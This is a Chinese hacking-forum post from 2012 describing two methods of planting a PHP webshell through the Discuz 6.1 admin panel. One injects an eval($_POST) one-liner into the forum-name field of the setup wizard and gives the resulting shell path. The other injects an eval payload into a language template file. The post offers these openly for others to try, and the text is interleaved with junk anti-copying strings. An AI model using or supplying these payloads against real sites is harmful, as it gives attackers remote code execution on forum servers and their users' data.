找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2342|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
discuz6.1两种方法后台拿shell% M* ?1 p0 _# Q3 b
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
2 w. G/ W- s4 s4 }2 E1:# p4 P6 H8 D* D' {6 O: \
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
0 k0 y) z# x9 v) Padmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell% s' o( W: o! f+ w+ h
<?php eval($_POST[cmd]);?>
6 g/ I4 l$ N6 [9 O- T后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
8 d: m. C- A9 Q5 V# ^/ n) c( H: i
0 k% F! s6 Q1 f( t9 W) h
' u7 u6 c8 z4 H7 R2:后台模板管理--默认模板套系--详情! g0 L: J7 H% K) c2 Q
templates/default/actions.lang.php) ^6 r, @" m0 o) r, M$ \
jhackj\\');eval($_POST[cmd])?>;//
; P7 _5 v/ o/ X2 q1 K5 _8 ?: Y6 h/ M! m, e
利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表